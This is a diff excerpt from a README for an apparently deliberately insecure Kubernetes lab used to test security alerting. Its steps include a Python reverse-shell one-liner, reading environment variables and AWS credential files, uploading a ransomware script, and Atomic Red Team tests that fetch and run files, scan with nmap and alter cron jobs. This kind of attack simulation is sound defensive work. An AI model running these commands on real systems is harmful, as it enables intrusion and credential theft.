latiotech/insecure-kubernetes-deployments/README.md

     - `export RHOST="WORKLOAD-POD-IP";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'`
 5. Check what secrets we might have access to `printenv` and `cat ~/.aws/credentials`
 6. Upload ransomware python script `ransomware.py`- this will indicate the level of alerting, if it's new file, python, or specifics about the python
-7. Exec into the workload security evaluator pod with `k exec -it [POD-NAME] -n workload-security-evaluator -- /bin/bash`, then `pwsh`
+7. Exec into the workload security evaluator pod with `k exec -it [POD-NAME] -n insecure-app -- /bin/bash`, then `pwsh`
 8. `Invoke-AtomicTest T1105-27` - download and run a file
 9. `Invoke-AtomicTest T1046-2` - run nmap
 10. `Invoke-AtomicTest T1053.003-2` - modify cron jobs